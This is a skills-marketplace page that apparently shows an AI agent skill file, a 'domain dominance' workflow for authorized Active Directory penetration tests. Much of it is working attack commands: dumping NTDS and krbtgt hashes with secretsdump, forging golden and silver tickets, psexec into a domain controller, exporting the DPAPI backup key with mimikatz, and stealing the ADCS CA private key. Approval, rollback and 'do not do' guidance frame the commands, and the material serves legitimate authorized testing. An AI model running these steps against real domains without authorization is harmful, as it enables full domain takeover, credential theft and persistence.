All skills
hardw00t avatar

/network-pentest

@f9bb3b2

Internal network and Active Directory penetration testing skill for corporate environments. Use when performing authorized internal network assessments, AD attack path analysis, lateral movement, privilege escalation, and post-exploitation across Windows/Linux estates. Covers BloodHound, Impacket, NetExec/CrackMapExec, Responder, Rubeus, mimikatz, certipy. Triggers on requests to pentest internal networks, attack AD, perform lateral movement, Kerberoast, DCSync, or escalate privileges.

Use this Skill: https://skilld.dev/gh/hardw00t/ai-security-arsenal/network-pentest

This session only. Nothing lands on disk.

workflowsdomain_dominance.md

≈1.2k tokens on demand. Your agent reads this file only when SKILL.md points to it.

Workflow: Domain Dominance

You hold Domain Admin (or equivalent replication rights). Objective: demonstrate full-domain compromise, acquire persistence primitives for report evidence, then roll back any destructive changes.

CRITICAL: Every step below has domain-wide blast radius. Require explicit written approval for each sub-step the customer has opted into. When in doubt, STOP and ask.

Preconditions

  • Credentials with DCSync rights OR DA / EA membership
  • Change-management window agreed (tickets forged, krbtgt touched)
  • Defender/IR team notified (if engagement ROE requires it)

Step 1. Full NTDS extraction (one-shot, documented)

# Preferred: targeted, minimal replication traffic
secretsdump.py corp.local/da_user:pass@dc.corp.local -just-dc-user krbtgt \
  > loot/krbtgt.txt

# Full domain hash dump — only if explicitly authorized
secretsdump.py corp.local/da_user:pass@dc.corp.local -just-dc-ntlm \
  -outputfile loot/ntds

Record start/end timestamps for customer IR reconciliation.

Step 2. Golden Ticket (forge arbitrary TGT)

Needs: krbtgt NT hash, domain SID, domain name.

# Get domain SID
lookupsid.py corp.local/da_user:pass@dc.corp.local 0 | grep 'Domain SID'

# Forge with Impacket
ticketer.py -nthash <KRBTGT_NT> -domain-sid S-1-5-21-... -domain corp.local \
  Administrator
export KRB5CCNAME=$(pwd)/Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@dc.corp.local

Use a time-boxed lifetime (-duration 10) for engagement tickets — don't forge 10-year tickets on production.

Step 3. Silver Ticket (service-scoped, stealthier)

Needs: service account NT hash, domain SID, SPN.

ticketer.py -nthash <SVC_NT> -domain-sid S-1-5-21-... -domain corp.local \
  -spn cifs/sql01.corp.local Administrator

No DC traffic at all — does not touch krbtgt.

Step 4. DPAPI backup key (domain-wide secret decryption)

# Extract the DPAPI domain backup key (one-time operation per domain)
secretsdump.py corp.local/da_user:pass@dc.corp.local \
  -just-dc-user 'BUILTIN\DPAPI_BACKUP' 2>/dev/null

# Or via mimikatz
mimikatz.exe "lsadump::backupkeys /system:dc.corp.local /export"

Enables offline decryption of every user's DPAPI-protected secrets (Chrome/Edge saved passwords, RDP creds, Wi-Fi keys).

Step 5. ADCS CA compromise (if ADCS in scope)

# Dump CA cert + private key (for persistence via "Golden Certificate")
certipy-ad ca -u da@corp.local -p pass -target ca.corp.local \
  -backup -dc-ip $DC_IP

Step 6. Evidence capture (before rollback)

For each dominance primitive, record evidence into loot/dominance/:

Primitive Evidence file
NTDS extraction ntds.ntds + timestamp
Golden Ticket Administrator.ccache + forge command log
DPAPI backup ntds_$BUILTIN_dpapi.txt
CA key ca_key.pfx + thumbprint

Screenshots: whoami /all under the forged context, Get-ADDomain output from the DA session.

Step 7. Rollback / cleanup (mandatory)

Anything modified or implanted must be reverted before engagement close:

Change Rollback
Added ACL ACE dacledit.py remove, confirm via re-enum
Added group member net rpc group delmem ...
krbtgt password reset (if used) Requires customer — reset krbtgt TWICE, 10h apart
Implanted AdminSDHolder ACE dacledit.py remove
Computer account created (MAQ) addcomputer.py -action delete
Scheduled task / service schtasks /delete, sc delete
Forged tickets Time-boxed (they expire); do not re-issue

CRITICAL: krbtgt must be reset TWICE with a gap >= the longest service ticket lifetime (default 10 hours). A single reset still accepts old golden tickets.

Step 8. Do NOT do (without explicit, separate approval)

  • Skeleton Key (misc::skeleton) on production DC — this is long-term persistence that survives reboot-until-mimikatz-unloaded but is detectable and invasive.
  • AdminSDHolder backdoor ACEs left in place.
  • DSRM admin account password sync + remote logon enablement.
  • krbtgt password reset without customer — can break services.
  • Full -just-dc against primary DC during business hours (replication storm).

Reasoning budget guidance

  • Step 6 evidence curation and Step 7 rollback ordering benefit from extended thinking — the ordering matters (e.g., remove scheduled task from host BEFORE removing the ACL that let you add it, or you lock yourself out of cleanup).

Multimodal hook

  • Capture a screenshot of an authoritative command under DA context (e.g., Get-ADDomain, nltest /dclist:corp.local). Link from schemas/finding.json#evidence.screenshot.

End of engagement

Produce the report using the structure in the main SKILL.md reporting notes, cross-reference each finding with the attack_chain field in schemas/finding.json.

Source: SKILL.md on GitHub

1 alert16d4 checks · Risk SAFE
  • Gen Agent Trust Hub16d

    The network-pentest skill is a highly structured, well-documented resource designed for authorized internal network and Active Directory penetration testing workflows. It provides clear playbooks, references, and configuration templates for using industry-standard security tools. No malicious behaviors, obfuscation techniques, or unauthorized data exfiltration paths were detected.

  • Socket16d

    13 alerts: gptSecurity, gptAnomaly

  • Snyk16d

    Risk: LOW · No issues

  • Runlayer7mo

    1/1 file flagged

Signed by skilld at f9bb3b2. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub 2 months ago.

Steadyupdated 6 months ago

README badge

README badge for hardw00t/ai-security-arsenal/network-pentest